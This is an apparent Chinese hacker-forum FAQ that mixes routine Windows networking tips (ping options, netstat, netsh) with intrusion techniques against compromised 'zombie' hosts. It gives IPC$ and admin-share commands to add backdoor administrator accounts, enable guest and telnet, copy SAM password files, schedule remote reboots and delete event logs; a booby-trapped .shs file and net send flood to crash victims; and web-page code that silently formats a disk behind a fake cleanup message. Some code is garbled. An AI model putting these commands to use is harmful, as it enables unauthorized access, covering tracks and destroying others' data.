202.96.105.101 ->
202.96.105.150 ->
61.153.112.90
Ping statistics for 202.96.105.101:
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 10ms, Maximum = 10ms, Average = 10ms
从上面我就可以知道从我的计算机到202.96.105.101一共通过了202.107.208.187 ,202.107.210.214 , 61.153.112.70 , 61.153.112.89 , 202.96.105.149 , 202.96.105.97这几个路由。
-s count Timestamp for count hops.
指定 count 指定的跃点数的时间戳。
此参数和-r差不多,只是这个参数不记录数据包返回所经过的路由,最多也只记录4个。
-j host-list Loose source route along host-list.
利用 computer-list 指定的计算机列表路由数据包。连续计算机可以被中间网关分隔(路由稀疏源)IP 允许的最大数量为 9。
-k host-list Strict source route along host-list.
利用 computer-list 指定的计算机列表路由数据包。连续计算机不能被中间网关分隔(路由严格源)IP 允许的最大数量为 9。
-w timeout Timeout in milliseconds to wait for each reply.
指定超时间隔,单位为毫秒。
此参数没有什么其他技巧。
32)ping命令的其他技巧:
在一般情况下还可以通过ping对方让对方返回给你的TTL值大小,粗略的判断目标主机的系统类型是Windows系列还是UNIX/Linux系列,一般情况下Windows系列的系统返回的TTL值在100-130之间,而UNIX/Linux系列的系统返回的TTL值在240-255之间,当然TTL的值在对方的主机里是可以修改的,Windows系列的系统可以通过修改注册表以下键值实现:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters]
"DefaultTTL"=dword:000000ff
255---FF
  128---80
  64----40
  32----20
1)如何查看本机所开端口:
用netstat -a —n命令查看!再stat下面有一些英文,我来简单说一下这些英文具体都代表什么
LISTEN:侦听来自远方的TCP端口的连接请求
SYN-SENT:再发送连接请求后等待匹配的连接请求
SYN-RECEIVED:再收到和发送一个连接请求后等待对方对连接请求的确认
ESTABLISHED:代表一个打开的连接
FIN-WAIT-1:等待远程TCP连接中断请求,或先前的连接中断请求的确认
FIN-WAIT-2:从远程TCP等待连接中断请求
CLOSE-WAIT:等待从本地用户发来的连接中断请求
CLOSING:等待远程TCP对连接中断的确认
LAST-ACK:等待原来的发向远程TCP的连接中断请求的确认
TIME-WAIT:等待足够的时间以确保远程TCP接收到连接中断请求的确认
CLOSED:没有任何连接状态
2)如何获得一个IP地址的主机名?
利用ping -a ip 命令查看!再第一行的pinging后面的 『ip』前面的英文就是对方主机名!
同样道理,利用ping machine_name也可以得到对方的ip
获得一个网站的ip地址的方法是:ping
www.***.com
比如想知道sohu的ip,就用ping
[url]http://www.sohu.com/[/url]来查看就可以了
顺便说一句:如果返回:Reply from *.*.*.*: TTL expired in transit的话,呵呵,代表TTL(生命周期)在传输过程中过期
什么意思呢?我来解释一下!
导致这个问题出现的原因有两个:1)TTL值太小!TTL值小于你和对方主机之间经过的路由器数目。 2)路由器数量太多,经过路由器的数量大于TTL值!
呵呵,其实这两点是一个意思!只不过说法不同而已!
3)如何查看本机的ip地址?
用ipconfig来查看就可以!
也可以再Windows中的开始菜单,运行中输入winipcfg,同样可以看到自己的ip
ipconfig命令后面如果加一个参数 /all的话,可以得到更加详细的资料,比如DNS、网关等……
4)再使用net命令的时候遇到一些错误代码,如何查看对应的错误信息?
用命令 net helpmsg erorr_code来查看就可以了
比如错误代码为:88
则查看命令为:net helpmsg 88 下面有这个错误代码的中文显示!
5)利用telnet连接到对方主机上,想获得一些系统信息,用什么命令?
set命令可以很好的完成你所需要收集信息的任务的!
方法:再cmd下直接输入set(telnet对方主机以后,也是直接set就可以了~然后能够得到NNNNN多的信息)
再这里,computername:呵呵,还用说么?主机名!
OS=Windows_NT :操作系统的类型哦~
path=C:\perl\bin\ :(perl的解释器位置!)
systemDrive=c: 操作系统盘符!
USERNAME=coldcrysky 当前登陆使用机器的用户
……
6)跟踪路由器的命令是什么?
tracert 格式:tracert ip
中间会列出所有经过的路由器列表!这些路由器如果是暴露再防火墙外面的话,还可以看到路由的IP哦~呵呵(这里又涉及到了另外一个问题:为什么要把路由放在防火墙后面?原因呢,主要有两点:1)保护路由器!因为现在越来越多的***和***已经开始瞄准路由器了~如果直接把路由暴露在外面,呵呵,是非常危险的!被DoS了就不好了啊~呵呵,所以要放在防火墙里面;2)为路由器减少负担!如果所有的过滤功能统统都压在路由器上面,呵呵,路由器的负担就太大了!)
当然,利用pathping也可以达到同样效果!格式与tracert一样!
7)简单介绍一下cookie!
cookie,又名小甜点。
它的作用:记录访问者的一些信息。例如利用cookie记录你所登陆这个网页的次数、登陆时曾经输入的信息……
最常见的是,大家再登陆论坛(邮箱)的时候,经常在输入第一个字母的时候,往往下面就显示出了所有在本机登陆过该论坛(邮箱)的用户名吧?呵呵,这个就是cookie的作用!
大家在Administrator的cookies目录中可以看到很多的记事本文档吧?这些都是cookie,虽然经过了加密,但是仔细查找的话,仍然能够看到一些敏感信息!况且现在也已经有了专门查看cookie的软件!利用这些软件,你的隐私将不保哦~
那么,如何清除cookie呢?一般情况下,可以在Internet选项中的常规选项卡中看到一个删除cookies的按钮,点击就可以清楚掉了~
除此以外,还要在internet选项中的内容选项卡中找到自动完成按钮,把里面的四项都选中!然后点击清除表单,清除密码~
然后到操作系统目录所在的分区中!进入Winnt(98为windows)目录(当然了,这些都是默认的目录!如果你安装的时候改名了,就对应的去相应目录)之后找到Temporary Internet Files目录(2000的目录在c:\Documents and settings\administrator\Local settings\Temporary Internet Files)98直接到windows目录下找Temporary Internet Files就可以了~,找到这个文件夹后,打开!看到里面有NNNNNNNNNNNN多的文件了么?呵呵,这些是你浏览过的网页的记录(有的时候从网站上面看到漂亮的FLASH,可是不能保存怎么办?只要在线浏览一遍以后,断线到这里来找*.swf,之后依次打开查看的话,相信你会找到你所需要的FLASH的!),好了,跑题了~继续说:这些文件是网站的页面记录,直接删除就可以了!
另外,有没有彻底禁止cookie的方法呢?
呵呵,当然有了!在IE的Internet选项中,找到隐私选项卡!,把里面的滑块拖到最上面,边上写着:阻止所有cookie,呵呵,是不是?
另外一种方法:找到Windows目录下的cookies目录!把里面的txt文件全部删除!,最后应该只剩下一个index.dat文件!之后把这个文件夹设置成只读就可以了~
不过,禁止cookie后,大部分的论坛都无法正常登陆了啊!呵呵,到底禁止不禁止就看你自己的了~
8)安装2000的时候,速度会特别特别特别慢,怎么加快安装速度呢?
在DOS上面安装,应该用98启动光盘来引导系统!然后按照下面的方法来做,可以提高安装速度:
g:\>cd windows -------假设G为光驱 windows为98的安装目录!
g:\windows>smartdrv -------加载smartdrv程序!加载后没有任何提示信息!只要不返回错误信息就是加载成功了~这时候安装2K的话,速度会很快的哦~
9)Windows2K密码忘记了,如何才能进入系统?
Windows2K的用户配置信息和密码保存在SAM文件里!该文件位于:c:\winnt\system32\config目录中!只要删除这个文件就可以了~
另外,在c:\winnt\repair目录中也同样有一个SAM文件(这个是前者的备份!)如果你在登陆肉鸡的时候,copy前面那个目录中的SAM文件,你会发现COPY不下来!呵呵,为什么?因为运行着的2K系统会保护SAM文件啊~这个时候你就COPY这个就可以了!
10)ping不到,tracert不到,但是却能用nbtstat显示对方的一些信息,为什么?
因为tracert和ping命令使用的是ICMP协议!而nbtstat是通过对方的netbios端口来获得对方的主机信息的!使用的是UDP和TCP协议!如果对方仅仅只对ICMP协议做了禁止的话,那通过这个命令获得系统信息是正常的!
11)telnet上去后,如何给对方开共享?
开共享的命令如下:net share c=c:\winnt\system 返回共享成功
之后直接利用\\ip\c来访问对方的system目录了~删除共享用
share c /del 命令就可以了
12)如何判断对方的具体操作系统版本?
首先用ver命令查看对方的版本号!
如果是5.00.2195的话,为2K;5.1.2600为XP
从这里可以区分出来到底是2K还是XP了~下面进行更加具体的区分!
2K的pro和svr版本区分:
在telnet下,net shart查看启动的服务~如果对方开启了Terminal Services服务的话,基本上可以判断为svr以上的版本了~如果没有开启,则为pro!(具体方法有三种,因为前几天在论坛中我回复过暗界了~所以这里就不再重复了~)
XP的pro和home版的区分:
home edition是无法安装iis的!所以,可以通过iis服务来判断到底是home版或者是pro了~
当然了,如果对方是pro,但是将iis删除(停用)的话,就没办法判断了~呵呵
13)如何查看98的随机启动的程序?
在98下有一个实用配置程序(msconfig),中文名为:系统配置实用程序,调用的方法是在:开始--运行中输入msconfig,在里面,有一个启动的选项卡,点击后,可以看到很多随即启动程序,如果前面带有钩的话,就是启动时随机启动的,取消的话就是把前面的小钩去掉就可以了~(如果在这里查看到了一些未知的启动文件--比如没有文件的具体路径,或者没有文件名的话,最好取消它的自启动!因为很有可能是***!)
除了这里以外,还有config.sys、autoexec.bat、system.ini、win.ini几个选项卡,他们分别对应这几个文件!只不过在这里更方便查看而已!
14)设置了BIOS密码,可是却忘记了,该怎么办?
如果是可以进入Windows的话,可以找找biospwds和cmospwd这两个软件看看~
还有利用DEBUG法:
简单介绍两种:
1)-o 70 16
-o 71 13
-q
2)-o 70 16
-o 71 16
-q
另一种方法:copy法:
copy con cmos.com
输入下面10个字符:alt+176,alt+17,alt+230, p,alt+176,alt+20,alt+230,q,alt+205,空格,然后按下F6并回车,退出,运行这个cmos.com程序就可以了~
恩,如果不能进入Windows怎么办呢?
简单介绍两种方法:
1)用通用密码:
Award Bios密码:j256,LKW-PPETER,wantgirl,EBBB,Syxz,AWARD? SW,AWARD_SW,j262,HLT SER,SKY_FOX,BIOSTAR,ALFARO_ME,lkwpeter,589721,awkard,h996,CONCAT,589589
AMI bios密码:AMI,BIOS,PASSWORD,HEWITT RAND,AMI_SW,LKWPETER,A.M.I.
这是常见的密码,不妨试试~
如果不行的话,可以利用CMOS放电:
就是把主板上的电池取下来,等一会儿再插上去~
15)如何自制一个让98蓝屏的×××?
恩,这个是前几天QQ上面朋友问我的问题,整理的时候突然间想起来了,就写一下好了~
首先,打开Word,再插入菜单中选择对象,这时,弹出对象包装程序窗口,再这个窗口中,点击导入,随便找一个文本或者程序就可以!之后点:编辑菜单。这里选择命令行,出现一个命令行窗口,在里面协商c:\con\con,点击保存,完成后,再点编辑包中的复制包,把他随便到一个地方复制下来,之后看到的是一个名位片断的东西!给这个文件起一个名字,呵呵,传给那个可怜的家伙吧,等待他蓝屏,掉线!
(这个命令行中可以插入很多的命令,不见得非要用这个98蓝屏漏洞哦~)顺便说一下:这个已经不是什么新鲜的技术了,这个技术的名字叫做:碎片对象。呵呵,碎片?记忆碎片么?不是的!他的后缀是:.shs!之所以说一下这个,是因为有的朋友还不知道~做一个整理而已!不知道的朋友看过后就知道了,知道的朋友就权当复习了~另外,不要利用这个方法做破坏!否则后果自负!
16)如何再命令行下杀死对方进程?
利用微软的2K以上操作系统都是含有这个工具的!该工具包含在2K光盘的\support\tools文件夹下!里面有安装程序,点击后,就安装了2K的support tools工具包,里面有kill这个工具,这时候再cmd下可以输入kill/?,就可以看到帮助了,使用这个命令的格式是:kill pid (pid是进程的ID号!)再任务管理器中可以看到进程的ID号!(不知道有几位朋友用过蓝色火焰?呵呵,用法跟这个一摸一样!还有很多类似的***、后门软件都有类似的功能!这个是windows自带的大***『后门工具』而已!)
这时候,有朋友问了,那再命令行下如何查看进程呢?呵呵,这就用到了系统自带的有一个后门工具了:再刚才说得那个目录中,还有一个工具叫tlist 看名字就能看出来是干什么的吧?用法更简单!直接输入tlist就可以得到pid遇队形程序的列表了~
那对方机器如果没有安装这两个程序怎么办呢?没关系,你把你操作系统盘符下面programfiles\support tools目录下面的这两个对应的exe文件上传到对方的winnt\system32目录中就可以了!呵呵~
17)上次说了ping的基本用法,这次谈谈ping的命令参数!
这个是本次问题集的重点部分!无论是小鸟还是老鸟,你们能保证你真的对这些参数了如指掌么?恐怕都未必!还是好好看看吧!
这是TCP/IP协议中最有用的命令之一
它给另一个系统发送一系列的数据包,该系统本身又发回一个响应,这条实用程序对查找远程主机很有用,它返回的结果表示是否能到达主机,宿主机发送一个返回数据包需要多长时间。
Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS]
[-r count] [-s count] [[-j host-list] [-k host-list]]
[-w timeout] destination-list
Options:
-t Ping the specifed host until interrupted.(除非人为中止,否则一直ping下去)
-a Resolve addresses to hostnames.(把IP转为主机名)
-n count Number of echo requests to send.(响应请求的数量)
-l size Send buffer size.(封包的大小)
-f Set Don`t Fragment flag in packet.(信息包中无碎片)
-i TTL Time To Live.(时间)
-v TOS Type Of Service.(服务类型)
-r count Record route for count hops.
-s count Timestamp for count hops.
-j host-list Loose source route along host-list.
-k host-list Strict source route along host-list.(较严格的……唉,怎么译好……算了,放着吧)
-w timeout Timeout in milliseconds to wait for each reply.(timeout的时间)
比如大家可能都知道的一个命令 # ping -f -s 65000 ***.***.***.***或者前阶段大家所谓ping死霉国佬时所用的命令(当然这样只会造成我方自己的网络阻塞)。
其实这个命令主要是用来看对方应答的速度,如果怎么ping 得到的结果都是request time out。那恐怕你根本就不用你去找这台主机了,它不在你的射程之内。
18)如何查看本机的DNS服务器?
ipconfig其实是可以的(呵呵,上次就介绍过这个命令),除此以外,还可以利用一个命令:再cmd下输入netsh,进入到netsh>提示符,再输入:int ip 进入到interface ip> 然后再次输入dump,这时候屏幕上出现当前连接的配置情况了
这里必须介绍一下netsh到底是作什么用的!这个命令比较复杂,他包含了很多的子命令,所以这里只对部分命令进行讲解:
1)查看本机IP:首先键入netsh,再netsh>提示符下输入:interface 回车 之后:ip 回车 再之后:show address 回车 这样,就可以看到当前连接的IP地址和子网掩码。(其实这个命令不如ipconfig简单,也不如ipconfig/all全面)
2)修改网络配置:接着上面的命令,我们使用:set address name=“本地连接” source=static addr=192.168.0.200 mask=255.255.255.0,这样就修改了当前的IP地址,用show address来看看(或者用ipconfig)
3)显示一个完整的网络配置教本:
刚才说过,第一个命令显示的信息不如ipconfig/all全面,不用着急,netsh再打印显示网络配置上,还是有自己的特色的!例如:再interface ip>状态下输入:dump,会显示一个清单,显示所有本地连接(不管你是否使用~)与netstat -an不完全一样!
这就是netsh的简单介绍和最基础的用法!希望大家能够掌握!还可以输入?来查看帮助!(要在netsh>提示符下才能查看帮助啊~)
19)肉鸡上的部分文件无法删除,怎么办?
如果对方的文件夹是只读的话,会出现拒绝访问的字样!这时候,我们可以再del命令后面加上/f参数来删除!
20)再说一个可以限制用户登陆时间的命令!
再net命令中就可以实现这样的功能!具体方法如下:
假如我们打算让:coldcrysky这个用户再周日到周易的上午八点到下午四点之间可以登陆,用这个命令:
net user coldcrysky /timesunday-monday,08:00-16:00
之后利用net user coldcrysky命令来查看登陆时间的限制,可以看到是我们所规定的时间(因为是中文的,很容易懂,我就不多废话了)
在此,特别提醒各位:命令中:星期日才是一周的开始!!!不要当成星期一!
光说了怎么设置,如果想恢复回去怎么办呢?(就是恢复成默认状态,任何时间都可以登陆的状态)
看我的:net user coldcrysky /time:all --这样就可以了~
22)如何删除windows2K的默认贡献?
首先打开记事本,输入如下内容:
net share c$ /delete
net share d$ /delete
net share e$ /delete
net share f$ /delete
net share g$ /delete
net share ipc$ /delete
net share admin$ /delete
这里的c$、d$、e$……是代表默认共享的盘符~又几个就设置几个就可以了~
之后点击保存成批处理文件(后缀为:bat的文件!)!加入到启动组中就可以了~
23)139端口的又一用法
呵呵,写这个帖子的原因是因为我答应给一个朋友回复139端口的作用来着……先声明两点:1)不要利用本帖所提到的方法去搞恶意破坏!2)呵呵,可能许多人已经知道了139端口这个用法了~本文只想起到一个抛砖引玉的作用!
废话不多说了~开始:
如果你使用NT主机的话,那你可要注意了!
重启NT主机的方法如下:
1:Net use \\XXX.XXX.XXX.XXX\ipc$ "password" /user:"username"
建立一个IPC连接
2:net use H: \\XXX.XXX.XXX.XXX\C$
将对方的C盘映射为自己的h盘
3:copy c on h:\reboot.bat
Iisreset /reboot
CTRL+Z
在对方的C盘上生成一个能重启机器的文件
4:net time \\XXX.XXX.XXX.XXX
得到对方机器时间
5:at \\XXX.XXX.XXX.XXX 重启的时间 c:\reboot.bat
设定对方重启的时间!
6:at \\XXX.XXX.XXX.XXX
查看任务上面是否添加了这个任务
7:等对方重启好了~
上面的第三步是only for Win2K的,如果是Nt,就需要用意个指定的重启程序,我们可以自己编写一个reboot.exe来代替reboot.bat,代码如下:
#include "stdio.h"
#include "windows.h"
int main()
{
文件://定义重启的时候发送给所有用户的消息
LPSTR msg="Reboot Tool By LionHook\nhttp://www.xici.net";;
文件://尝试用最简单的API函数重启
if(ExitWindowXXX(EWX_REBOOT.0))return TRUE;
if(ExitWindowXXX(EWX_REBOOT | EWX_FORCE,0))return TRUE;
文件://因为上面的重启不成功,所以需要调整本进程的特权
HANDLE hToken;
TOKEN_PRIVILEGES tkp;
if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES |TOKEN_QUERY,&hToken)) return FALSE;
文件://获取重启的特权 SE_SHUTDOWN_NAME
LookupPrivilegevalues(NULL,SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid);
tkp.PrivilegeCount=1;
tkp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken,FALSE,&tkp,0,(POTKEN_PRIVILEGES)NULL,0);
文件://判断是NT内核还是9X内核,选择用不同的方式
if(!GetVersion()& 0x80000000))
InitiateSystemShutdown(NULL,msg,20,TRUE,TRUE);
else if (!ExitWindowXXX(EWX_REBOOT,0))
if(!ExitWindowXXX(EWX_REBOOT|EWX_FORCE,0))
return FALSE;
return TRUE;
对了,再次说明啊,别用本文提到的方法搞破坏,小心警察叔叔打PP~呵呵
24)利用批处理文件来建立一个记录3389登陆者信息的记录器
由于Terminal Service默认是没有日志记录的,只能依靠他的系统日志,但是系统日志只能记录一些大动作(开启或停止服务),那么,如何用批处理文件来编写一个将是3389端口的程序呢?很简单:
建立一个批处理文件:内容如下:
@echo off
date/t >> c:\3389log.txt
:TS3389
time/t >> c:\3389log.txt
netstat -an | find "3389" |find "ESTABLISHED" >>c:\3389log.txt
goto :TS3389
之后保存!
如果有人用你的3389登陆你的机器,呵呵,在c盘下就有3389log.txt这个文件!记录了当天日志,还有连接时间……资料~开始反击~呵呵
25)网络命令小节
A、NET命令:
IPC连接:格式 net use \\对方IP\ipc$ "密码" user:"用户名" 『建立IPC连接~』
net use \\对方IP\ipc$ /delete 『断开连接~』
以下操作需要在连接到对方主机后才可进行!!!
net user coldcrysky xyz /add 『在连接的目标主机中加入一个用户名为COLDCRYSKY 密码为WYZ的用户』
net localgroup Administrator coldcrysky /add 『把名为coldcrysky的用户加入ADMIN组-以为着权限的提高啊!!!^_^』
net use z:\\对方IP\C$ 『把对方的C盘映射为本机的Z盘-可依照需要更改映射盘符!』
net start telnet 『开启TELNET』
net user guest /active:yes 『激活GUEST』
net user guest coldcrysky 『把GUEST密码改为COLDCRYSKY』
B、AT命令:
查看远程机时间:net time \\对方IP
加入一项新任务:
at \\对方IP 时间 文件名 『用来把自己上传的后门程序在制定时间运行,方便以后进入肉鸡!』
C、TELNET命令:
telnet 对方IP 端口 『作用不用我说了吧???』
D、FTP命令:
登陆:ftp 对方网址(IP地址)
上传文件:get 文件在本机完整路径 对方文件存放完整路径
下载文件:put 对方文件完整路径 本机存放文件路径
E、COPY命令:
在建立连接后(尤其是IPC$连接后,很有用的命令哦~)
⑴copy index.htm \\127.0.0.1\c$\index.htm
『将本机index.htm文件复制到127.0.0.1的C盘下,如果要放到对方的NT目录下,则把C改为admin$』
⑵copy \\127.0.0.1\admin\repair\sam_ c: 『将远程机数据库文件拷贝到本机C盘根目录下』F、SET命令:
主要用于分析目标计算机的基本信息用!具体使用方法请查找相关文件!
G、NBTSTAT命令:
nbtstat -A 对方IP (这个A大写)
『在其中显示前面的英文或数字就是计算机名称!当然,也可以利用PING -A 对方ip的方法来查看对方主机名!效果相同!!!』
H、SHUTDOWN命令:
『用来关闭对方NT服务的命令』格式如下:
shutdown \\IP地址 t:20
『20秒后自动关闭对方NT服务!由于对对方机器影响较大,慎用!!!』
I、DIR命令:
还用我说么?大家是不是早就该掌握了???(不知道的还是查阅相关资料吧~~~)
J、ECHO命令:
echo coldcrysky >index.htm 『用coldcrysky覆盖掉原INDEX.HTM中所有内容』
echo coldcrysky >>index.htm 『把coldcrysky加入到index.htm中』
K、ATTRIB命令:
更改文件属性用,格式:
Attrib -r index.htm 『去掉只读属性』(+- 分别代表增加和减少)
L、DEL命令:
『删除日志的时候用!』
del c:\winnt\system32\logfiles\*.*
del c:\winnt\system32\config\*.evt
del c:\winnt\system32\dtclog\*.*
del c:\winnt\system32\*.log
del c:\winnt\system32\*.txt
del c:\winnt\*.txt
del c:\winnt\*.log
M、PING命令:
-t :ping制定IP,知道网络断开或按CTRL+C结束!
-a :解释PING IP的主机名
-n count :发送count指定的ECHO数据包,默认为4个!
26)这里我必须(或者说不得不重新重申一个命令!不过说之前我要把这个命令的相关命令稍微介绍一下!)
我要说的命令就是:开启服务和停止服务的net start and net stop
这两个命令大多数朋友已经很熟悉了吧?不过为了方便更多的菜鸟能看明白我要说的意思,不用再看其他相关文章,所以我简单说两句:net start是开启服务!那么,如何开启呢?比如,我们这里要开启telnet服务,那就直接再2K的cmd下输入:net start telnet就OK了~关闭一项服务的话,把start换成stop就OK了~不过这里必须要注意:你所关闭的服务必须是已经开启的服务!!!好像是一句废话
OK,有了这个前提后,下面就继续介绍:那么,net start和net stop到底能开启什么服务?其实这点也不需要你强记,记住这个命令就可以了:net help start和net help stop,这两个会显示出你所能开启的服务有那些~~
这里比如我们查到了这个服务“CLIENT SERVICE FOR NETWARE”,那么当这个命令使用net start和net stop的时候,你必须在这项服务上面加上“”,原因是因为这个服务名称中带有空格!如果服务名称中不带空格,你可以不用带这个引号!!!这点是我强调的问题!大家一定不要忘记了!『前些天看到S8S8.net的黑白新区中有人说net start 和 net stop后面的服务名必须带空格是错误的!明白原因了吧?』
27)关于双系统的两个问题:
A、如何在双系统(98、2000)中安全删除2K?
先制作一张Windows 98 的启动软盘,再用它启动你的计算机,运行sys命令恢复Windows 98引导记录后,再运行fdisk/mbr恢复主引导记录,完成后进入Windows 98,把winnt 和system volumn information 目录删除,再删掉C盘上的boot.ini、bootfont.bin、ntldr、nydetect.com、bootsect.dos文件就行了。
B、 Windows 98/XP双系统启动菜单修复
1.修复前,在BIOS中设置从光驱启动。用Windows XP安装盘启动电脑,在加载必要的驱动后,出现Windows XP的安装界面。有三个选项:
(1)要现在开始安装Windows XP,请按“Enter”键。
(2)要用“恢复控制台”修复Windows XP安装,按“R”键。
(3)要退出安装程序,不安装Windows XP,按“F3”键;
2. 按“R”键,进入“Microsoft Windows XP (TM) 故障恢复控制台”界面;故障恢复控制台提供系统修复和故障恢复功能。系统这时会搜寻已安装的Windows XP系统文件,然后显示搜寻结果,并询问“要登录到哪个Windows XP安装(要取消,请按Enter)”,选择1. D:\Windows,回车,系统会再询问“管理员密码”,再键入安装Windows XP时设置的管理员密码,回车,出现D:\Windows〉,这时需要输入修复命令Fixboot,后面的参数为启动扇区要写入的磁盘盘符,这里填入C:,回车。修复完成,键入Exit退出。重启后就会看到久违的双重启动菜单了。并且,这样修复后基本不产生垃圾文件。
因为这两个问题是非常非常普遍的,所以我就收集到这里了~
28)这里说几个主页恶意代码:『并不是让大家把这些代码加入到自己的主页中!只是希望大家能了解恶意代码,起到更好的防护作用!』
A、死循环代码:
『把下列代码加入到网页中,可达到如上效果』
说明:当含有这段代码的网页被人点击,连接就会不断的打开IE浏览器,直到你的系统资源浪费到0%~只有重新启动才能正常使用!
预防方法:禁用所有的ActiveX控件和插件!因为这是一个ActiveX教本程序~
B、恐怖的大图片:
『把下列代码加入到网页中,可达到如上效果』
http://恐怖图片的连接地址" width= "1" height= "100000000000000000000000">
说明:当打开这样的网页,IE会不断的解释试图打开,但由于图片实在太大,超出了其处理能力,所以……
C、地震死机代码:
『把下列代码加入到网页中,可达到如上效果』
if (window.top.moveBy){
for (i = 1;i 0; j--){
window.top.moveBy(0,i);
window.top.moveBy(i,0);
window.top.moveBy(0,-i*2);
window.top.moveBy(-i*2,0);
window.top.moveBy(0,i);
window.top.moveBy(i,0);
}
}
}
说明:是windows9x的设备名称解析漏洞!
WINDOWS9x的\con\con设备名称解析漏洞允许用户进行***,倒是98死机。原理:我们知道,CON是DOS下的特殊设备名,不允许做文件名,如果我们在DOS下键入如下命令:copy coldcrysky.txt con,系统会显示coldcrysky.txt的内容,如果换成:copy coldcrysky.txt>con系统会提示文件不能拷贝到文件自身。如果吧con换成LPT或PRN,则输出coldcrysky.txt到打印机。由此可见,CON代表文件本身,如果使用\CON\CON命令,则意味着系统不断调用文件本身,视系统资源迅速枯竭,连按CTRL+ALT+DEL的机会都没有~
解决办法:
对于9X系统,强烈建议打补丁!!!2000和XP则不会死机~
D、格式化硬盘:(最恐怖的~~~慎用!!!请勿用于非法用途!!!使用后如果有任何负作用,后果自负!与伤寒天空『ColdCrySky』;乱刀留影无关!!!)
scr,Reset();
scr.Path="C:\\WINDOWS\\StartMenu\\Programs\\启动\\startup.htm";
scr.Doc=""
WSH.rUN(`start/m format.com d:/q/autotest/u`);
alert(`IMPORTANT : Windows is removing unused temporary files.`);
scr.write();
说明:当您浏览了网页,会把startup.hta文件写入启动文件夹,并提示WINDOWS正在删除临时文件!实际上是在格式化你的D盘,代码中的:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B对应为:Windows Scripting Host Shell Object。代码中的:WSH全称是:Windows Scripting Host,是微软的一种基于32位系统平台与语言无关的教本解释机制,它使得脚本能在WINDOWS桌面或命令提示符下运行~WSH所对应的程序WScript.exe是一个脚本语言解释器,位于WINDOWS所在文件夹下,所以它可以像执行批处理文件一样执行WSH脚本程序~
解决方法:1)更新您的浏览器,使用最新的浏览器上网!
2)修改msdos.sys,在其中加入:Bootmentu=0命令行,目的是禁用启动菜单。
3)吧format.com改名
4)禁用WSH。具体方法:在win98中,从添加删除程序中点击WINDOWS安装程序,打开附件一项,将WINDOWS SCRIPTING HOST前面的选项去掉,就可以卸载掉WSH了~~~win2000和xp的用户可以在我的电脑-工具菜单-文件夹选项-选择文件类型,找到VBS VBSCRIPT FILE选项,点击删除!
29)系统自带的系统工具
其实无论大家从什么地方,什么方法找到一些好用的工具,都不如Windows自带的工具用着方便(假设你区的地方正好不能上网,而你又没有准备好这些工具,那怎么办?呵呵,不用着急,用好下面几个Windows自带的小工具,可以使你事半功倍!)
1、msinfo32.exe
位于C:\Program Files\Common Files
Microsoft Shared\Msinfo\msinfo32.exe,显示计算机中的有关系统信息,可用其诊断、解决计算机问题并查看远程系统所生成的系统报告。
2、drwatson.exe --这个工具给我特别的亲密感觉:第一次使用这个工具是在看了LK007大哥给cool兄弟的回复以后,我马上试验~果然很有意思!LK007不愧是大哥!现在想起来都佩服不已~~~
位于C: \Windows \drwatson.exe,当某个应用程序在运行过程中出错时,它就会将出错的程序以及出错的内存地址一一记录下来,并保存为Windows的Drwatson子目录下的*.wlg记录文件。
3、sfc.exe
位于C:\Windows\System\sfc.exe,用于自动搜索被改变、删除或损坏了的系统文件。
4、msconfig.exe
位于C:\Windows\System\msconfig.exe,通过修改启动方式以及启动时运行哪些应用程序等系统配置,从而达到快速排除故障的目的。
5、scanreg.exe
位于C:\windows\command\scanreg.exe(DOS版本)及C:\windows\scanregw.exe(Windows版本),用于检查、修复、备份以及还原系统注册表及相关配置文件的工具软件,防止因注册表数据被破坏而导致的系统故障。
6、vcmui.exe
位于C:\Windows\vcmui.exe,在后台自动将被覆盖的驱动程序备份下来,当我们安装的新驱动出错时可用它进行恢复。
7、winrep.exe
位于C:\Windows\winrep.exe,能自动收集有关系统信息并提示用户输入故障所在,帮我们编写一篇完整的“求援”报告,并将其发送给有关技术维护人员,简化“求援”操作。
这七个Windows自带的小程序可以在开始菜单--运行中直接输入文件名(无需输入扩展名)调出该程序!
30)批处理在***中的几则妙用!
A、简化IPC$登陆肉鸡的操作:
用记事本建立一个名字为:ipcruqin.bat的批处理文件,内容如下:
@net use \\%1\ipc$ %3 /u:"%2"
@echo OK!已经成功建立连接
之后,大家在CMD下输入:ipcruqin.bat 肉鸡IP 肉鸡的admin帐号/用户的密码。就可以登陆上去了,而不需要那一大长串的命令了!
B、批处理轰炸对方电脑:
打开一记事本,在里面输入如下内容:
@echo 正在轰炸中……
tart
@net send %1 %2
@if errorlevel 1 goto over
goto start
ver
@echo 发送失败
将其保存为bat格式的文件即可,使用方法:*.bat(该批处理文件的名字)+ 空格 + 目标IP + 空格 + 你要对他说得话!
这次先简单介绍这三个!等下次有机会再给大家介绍更多的批处理文件的用途!
31)再说几个非常简单实用的DOS命令(工具):
A、fport.exe --查看那些端口都是那些程序使用的命令。
B、netstat -an --查看那些端口于外部的IP连接。比如这里显示 :23 XX.XX.XX.XX 而你又没有开23端口,那么,呵呵……还用我说么?
C、letmain.exe \\ip -admin -d --列出本机的administrators组的用户名查看是否有异常。
D、pslist.exe --列出进程
E、pskill.exe --杀掉进程,有时候再任务管理器中无法终止程序,那就用这个工具来停止进程。
F、login.exe --列出当前有那些用户登陆再你的机器上。
ping命令详解
ping [-t] [-a] [-n count] [-l length] [-f] [-i ttl] [-v tos] [-r count] [-s count] [[-j computer-list] | [-k computer-list]] [-w timeout] destination-list
Options:
-t Ping the specified host until stopped.To see statistics and continue - type Control-Break;To stop - type Control-C.
不停的ping地方主机,直到你按下Control-C。
此功能没有什么特别的技巧,不过可以配合其他参数使用,将在下面提到。
-a Resolve addresses to hostnames.
解析计算机NetBios名。
示例:C:\>ping -a 192.168.1.21
Pinging iceblood.yofor.com [192.168.1.21] with 32 bytes of data:
Reply from 192.168.1.21: bytes=32 timeping -n 50 202.103.96.68
Pinging 202.103.96.68 with 32 bytes of data:
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Request timed out.
………………
